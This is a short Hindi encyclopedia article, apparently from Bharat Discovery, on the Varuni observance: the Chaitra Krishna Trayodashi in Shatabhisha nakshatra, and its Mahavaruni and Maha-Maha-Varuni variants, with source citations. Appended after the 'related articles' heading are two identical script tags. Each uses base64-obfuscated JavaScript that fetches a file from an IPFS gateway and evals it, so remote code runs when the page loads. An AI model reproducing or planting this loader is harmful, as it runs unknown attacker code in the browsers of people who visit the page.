वारुणी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
  • भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
  • चैत्र कृष्ण पक्ष की त्रयोदशी को, जब वह शतभिषा नक्षत्र[1] में पड़े तो उसे वारुणी कहते हैं, जो कि एक करोड़ सूर्य ग्रहण के समान है।
  • यदि यह इसके साथ शनिवार को पड़े तो महावारुणी कही जाती है।
  • इन सब बातों के साथ यदि शुभ योग पड़े तो इसे महा-महा-वारुणी कहा जाता है। [2]


टीका टिप्पणी और संदर्भ

  1. जिसके देवता वरुण हैं
  2. वर्षक्रियाकौमुदी (518-519); कृत्यतत्त्व (463); स्मृतिकौस्तुभ (107); गदाधरपद्धति (611, स्कन्दपुराण से उर्द्धरत); कालतत्त्वविवेचन (189-190

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>